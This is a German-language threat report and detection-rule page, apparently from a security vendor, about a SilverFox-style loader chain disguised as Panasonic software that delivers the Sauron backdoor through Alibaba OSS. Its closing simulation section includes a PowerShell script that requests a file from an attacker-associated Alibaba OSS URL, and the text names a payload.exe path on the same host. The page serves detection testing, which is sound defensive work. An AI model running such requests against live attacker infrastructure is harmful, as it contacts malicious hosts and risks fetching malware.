SilverFox-ähnliche Loader-Kette verwendet Panasonic-Shells, Alibaba OSS und Sauron
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Diese Bedrohung konzentriert sich auf eine hochentwickelte mehrstufige Ladeprogramm-Kette, die als legitime Panasonic-Software getarnt ist. Die Malware verwendet Alibaba OSS zur Bereitstellung von Payloads und setzt auf bildbasierte verschlüsselte Träger, die ein charakteristisches fünf-Byte-EOF-Trailer-Format verwenden. Die letzte Phase installiert den Sauron-Backdoor, der durch Dienst-Erstellung und gezielte Registrierungsänderungen persistiert.
Untersuchung
Analysten führten sowohl eine statische als auch eine dynamische Analyse durch und deckten eine Abfolge von Side-Loading-Operationen auf, die von Binaries, getarnt als Tencent- und Philips-Software, durchgeführt wurden. Die Untersuchung enthüllte eine geschichtete Entschlüsselungsroutine unter Verwendung von inkrementierendem XOR und RC4 sowie die Erstellung geplanter Aufgaben über RPC-Mechanismen. Speicherforensik und Sandbox-Telemetrie halfen, den vollständigen Ausführungspfad vom anfänglichen Panasonic-basierten Wrapper bis zum endgültigen Sauron-Backdoor zu rekonstruieren.
Minderung
Organisationen sollten die unbefugte RPC-basierte Planung von Aufgaben und die verdächtige Erstellung geplanter Aufgaben über NdrClientCall3überwachen. Eine starke Anwendungs-Whitelist kann helfen, die Ausführung nicht genehmigter Side-Loaded-DLLs zu blockieren. Verteidiger sollten auch auf unerwartetes Löschen von Volume-Schattenkopien und verdächtige Registrierungsänderungen unter HKCUSOFTWARE.
Reaktion
Wenn diese Aktivität erkannt wird, isolieren Sie die betroffenen Systeme sofort, um eine weitere laterale Bewegung oder Kommunikationskommandos zu stoppen. Führen Sie Speicherforensik durch, um die injizierten Module zu identifizieren und den aktuellen Stand der Ladeprogramm-Kette zu bestimmen. Netzprotokolle sollten ebenfalls auf Verkehr zu Alibaba OSS-Infrastruktur und den bekannten Kommando-und-Kontroll-IP-Adressen überprüft werden, die während der Ersteinschätzung identifiziert wurden.
Angriffsverlauf
Erkennungen
Systemprozesse aus untypischen Pfaden (via process_creation)
Ansicht
Verdächtige Ausführungen aus dem öffentlichen Benutzerprofil (via process_creation)
Ansicht
Verdächtige VSSADMIN Aktivität (via cmdline)
Ansicht
Verdächtige Änderungen in den Windows Defender Einstellungen (via powershell)
Ansicht
Verdächtige Dateien im öffentlichen Benutzerprofil (via file_event)
Ansicht
Erkennung von SilverFox-Stil-Ladeprogramm-Netzwerk-Indikatoren [Windows Netzwerkverbindung]
Ansicht
Erkennung von SilverFox-Stil-Ladeprogramm unter Verwendung eines infizierten Panasonic-Executable [Windows Process Creation]
Ansicht
Simulation ausführen
Voraussetzung: Der Telemetrie- und Basislinie-Freigabestart muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifer-Technik (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und sollen die genaue Telemetrie erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.
-
Angriffsaufbau und Befehle: Der Angreifer beabsichtigt, eine zweite Stufe der Nutzlast herunterzuladen, indem ein legitimer Cloud-Speicherdienst verwendet wird, um sich in den normalen Datenverkehr einzufügen. Der Angreifer nutzt einen PowerShell-One-Liner, um einen Loader zu simulieren, welcher eine Anfrage an eine bekannte SilverFox Alibaba OSS URL stellt:
https://jun616.oss-cn-beijing.aliyuncs.com/tad/payload.exe. Diese Aktion zielt darauf ab, einfache Domain-Filter zu umgehen, indem sie auf den Ruf vonaliyuncs.comzurückgreift und den spezifischen bösartigen Pfad nutzt, der in der Erkennungsregel definiert ist. -
Regressionstestskript:
# Simulation eines SilverFox-Ladeprogramms-Netzwerkindikators # Dieses Skript versucht, eine Verbindung zu der spezifischen von der Sigma-Regel überwachten URL herzustellen. $targetUrl = "https://jun616.oss-cn-beijing.aliyuncs.com/tad/test_file.txt" Write-Host "[!] Simulation der SilverFox-Netzwerkverbindung zu: $targetUrl" try { # Mit Invoke-WebRequest zur Erzeugung standardmäßiger HTTP-Proxy-Telemetrie $response = Invoke-WebRequest -Uri $targetUrl -Method Get -UseBasicParsing Write-Host "[+] Anfrage abgeschlossen. Statuscode: $($response.StatusCode)" } catch { # Wir erwarten einen 404- oder Verbindungsfehler, wenn die URL tatsächlich keine Datei hostet, # aber das Proxy-Protokoll wird dennoch den Versuch aufzeichnen. Write-Host "[-] Anfrage versucht. Überprüfen Sie die Proxy-Logs für den Verbindungsversuch." } -
Bereinigung Befehle:
# Keine nachhaltigen Änderungen durch diese Simulation; keine Bereinigung erforderlich. Write-Host "[*] Bereinigung der Simulation abgeschlossen."